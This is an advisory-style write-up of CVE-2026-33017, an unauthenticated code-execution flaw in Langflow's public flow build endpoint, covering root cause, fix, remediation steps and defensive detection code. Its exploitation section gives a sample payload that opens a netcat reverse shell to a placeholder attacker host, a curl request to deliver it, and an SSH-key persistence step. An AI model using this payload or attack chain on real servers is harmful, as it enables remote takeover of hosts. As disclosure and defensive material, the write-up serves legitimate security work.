Langflow <1.9.0: unauthenticated remote code execution via public flow build endpoint (CVE-2026-33017)

Summary

In today’s episode we cover CVE-2026-33017, a critical unauthenticated remote code execution vulnerability in Langflow-ai’s Langflow tool. Disclosed on March 20, 2026, and patched hours later in version 1.9.0, this flaw was exploited within 20 hours of publication, highlighting the speed at which attackers can weaponize code injection bugs in AI workflow platforms.

Product details

Langflow is an open-source tool that lets developers design, build, and deploy AI-powered agents and workflows via a web interface and REST API. It’s hosted on GitHub under the langflow-ai organization, and prior to version 1.9.0 the project supported public and private flows with a build endpoint that inadvertently allowed unauthenticated access to code execution.

Vulnerability type summary

This issue combines three CWE categories: CWE-94 Improper Control of Generation of Code (Code Injection), CWE-95 Improper Neutralization of Directives in Dynamically Evaluated Code (Eval Injection), and CWE-306 Missing Authentication for Critical Function. The root cause is allowing attacker-supplied flow definitions to be passed unchecked to Python’s exec() function without sandboxing or authentication.

Details of the vulnerability

The vulnerable endpoint is POST /api/v1/build_public_tmp/{flow_id}/flow. Although designed to let unauthenticated users build publicly shared flows, the implementation also accepted an optional data payload and, when it was supplied, used it instead of the flow data stored in the database. If that payload contained node definitions with arbitrary Python code, the server would call exec() on it with zero isolation. An attacker who supplied the flow_id of a public flow together with a crafted data JSON could execute system commands, escalate privileges, or drop backdoors on the host. This is distinct from CVE-2025-3248, which was fixed by adding authentication to the /api/v1/validate/code endpoint; here the mistake was treating build_public_tmp as safe for unauthenticated use while it still accepted attacker-supplied flow data. The fix in 1.9.0 enforces using stored flow data or requires explicit confirmation and sanitization of any dynamic input.
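
The trust decision behind the fix, as an added sketch that is not Langflow's own code: an anonymous build request may only select which stored public flow is built, and any client-supplied `data` is refused. The store, class and function names are hypothetical, and the flow contents are constructed.

```python
from dataclasses import dataclass


class BuildRejected(Exception):
    """The anonymous build request must not proceed."""


@dataclass(frozen=True)
class StoredFlow:
    is_public: bool
    data: dict  # definition saved earlier by an authenticated owner


# Constructed stand-in for the flow table (hypothetical ids and contents).
FLOW_STORE = {
    "pub-1": StoredFlow(True, {"nodes": [{"id": "a", "type": "ChatInput"}]}),
    "priv-1": StoredFlow(False, {"nodes": [{"id": "b", "type": "Prompt"}]}),
}


def select_definition_vulnerable(flow_id: str, body: dict) -> dict:
    """Pre-fix behaviour as described: request data replaces the stored flow."""
    stored = FLOW_STORE[flow_id]
    return body.get("data") or stored.data


def select_definition_hardened(flow_id: str, body: dict) -> dict:
    """Anonymous callers may only pick which stored public flow is built."""
    stored = FLOW_STORE.get(flow_id)
    if stored is None or not stored.is_public:
        # Same error for both cases, so private flow ids are not confirmed.
        raise BuildRejected("no such public flow")
    if body.get("data") is not None:
        # Refuse instead of silently ignoring, so probing shows up in logs.
        raise BuildRejected("client-supplied flow data is not accepted")
    return stored.data
```

Whatever `select_definition_vulnerable` returns is what would reach exec(); in the hardened version only definitions that were written to the store can get that far.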

Conclusion

CVE-2026-33017 underscores the importance of authentication and sandboxing when evaluating user-supplied code. Users of Langflow should upgrade immediately to version 1.9.0 or later. Security teams building AI platforms must review code execution paths, apply the principle of least privilege, and avoid blind use of exec-style functions. That wraps up our deep dive into this high-risk vulnerability. Stay safe and keep your dependencies up to date.

Watch the full video on YouTube: CVE-2026-33017

Remediation and exploitation details

This chain involves the following actors

  • Unauthenticated Attacker: Remote actor exploiting the public flow build endpoint without credentials
  • System Administrator: Responsible for deploying, configuring, and updating Langflow instances

The following systems are involved

  • Langflow Server (Hosts AI workflow definitions and executes flow builds): Target service running vulnerable code
  • Build Public Flow Endpoint (Allows public flow compilation without authentication): Attack surface that processes attacker-supplied flow data

Attack entry point

  • POST /api/v1/build_public_tmp/{flow_id}/flow: Public endpoint intended for building shared flows, but accepts an optional data parameter and passes node definitions directly to exec() without sandboxing or authentication

Remediation actions

Actor: System Administrator
Action: Upgrade Langflow to version 1.9.0 or later
System: Langflow Server

Actor: Developer
Action: Require authentication on the build_public_tmp endpoint and sanitize or remove exec() on untrusted data
System: Build Public Flow Endpoint

Actor: DevOps Engineer
Action: Restrict access to public endpoints via network controls and firewall rules
System: Langflow Server
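
To support these actions while instances are being upgraded, the following added example (not part of the original page or of Langflow) scans request records for POSTs to the build endpoint whose body carries a `data` key, the request shape described under "Attack entry point". The log schema, with the request body captured as text, and all sample records are constructed assumptions.

```python
import json
import re
from urllib.parse import urlsplit

BUILD_PATH = re.compile(r"^/api/v1/build_public_tmp/([^/]+)/flow/?$")


def _rec(src, method, uri, body):
    # Hypothetical log schema: one JSON object per request, body kept as text.
    return json.dumps({"src": src, "method": method, "uri": uri, "body": body})


# Constructed sample records; addresses are documentation ranges.
SAMPLE_LOG = [
    _rec("198.51.100.7", "POST", "/api/v1/build_public_tmp/1234/flow", "{}"),
    _rec("203.0.113.9", "POST", "/api/v1/build_public_tmp/1234/flow?x=1",
         '{"data": {"nodes": {"1": {"type": "code"}}}}'),
    _rec("203.0.113.9", "GET", "/api/v1/flows", ""),
    _rec("192.0.2.44", "POST", "/api/v1/build_public_tmp/abcd/flow", '{"data": '),
    "not json at all",
]


def flag_build_requests(lines):
    """Return (src, flow_id, reason) for build requests that carry flow data."""
    findings = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # not a request record
        if not isinstance(rec, dict) or rec.get("method") != "POST":
            continue
        match = BUILD_PATH.match(urlsplit(str(rec.get("uri", ""))).path)
        if not match:
            continue
        try:
            body = json.loads(rec.get("body") or "{}")
        except (json.JSONDecodeError, TypeError):
            # Truncated or malformed bodies cannot be cleared, so surface them.
            findings.append((rec.get("src"), match.group(1), "unparseable body"))
            continue
        if isinstance(body, dict) and body.get("data") is not None:
            findings.append((rec.get("src"), match.group(1), "client-supplied data"))
    return findings
```

A hit is a request to review, not proof of compromise; correlate it with the instance's version and with process or outbound-connection activity on the host around the same time.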

Exploitation actions

Enumeration

Actor: Unauthenticated Attacker
Action: Discover a valid public flow identifier
System: Langflow Server
Examples:
  • GET https://langflow.example.com/api/v1/flows to list public flows and pick a flow_id

Payload crafting

Actor: Unauthenticated Attacker
Action: Construct malicious flow payload containing arbitrary Python code in a node definition
System: Build Public Flow Endpoint
Examples:
  • {"data": {"nodes": {"1": {"type": "code", "code": "import os; os.system('nc attacker.com 4444 -e /bin/sh')"}}}}

Remote code execution

Actor: Unauthenticated Attacker
Action: Send HTTP POST request to the build endpoint with the malicious payload
System: Build Public Flow Endpoint
Examples:
  • curl -X POST https://langflow.example.com/api/v1/build_public_tmp/1234/flow -H "Content-Type: application/json" -d '{"data":{...}}'

Arbitrary code execution

Actor: Unauthenticated Attacker
Action: Server invokes exec() on attacker-supplied code, executing it on the host
System: Langflow Server
Examples:
  • Python exec() runs os.system('nc attacker.com 4444 -e /bin/sh') establishing a reverse shell

Post-exploitation

Actor: Unauthenticated Attacker
Action: Deploy persistence mechanisms or escalate privileges on the compromised host
System: Langflow Server
Examples:
  • Add SSH public key to ~/.ssh/authorized_keys or install a backdoor service

CVE database technical details

  • CVE ID: CVE-2026-33017
  • Description: Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0.
  • Provider: GitHub_M
  • CWE / problem types: CWE-94: Improper Control of Generation of Code ('Code Injection'); CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection'); CWE-306: Missing Authentication for Critical Function
  • Affected software versions: langflow-ai:langflow, version < 1.9.0 (status: affected)
  • Date published: 2026-03-20T04:52:52.885Z
  • Last updated: 2026-03-20T18:41:53.573Z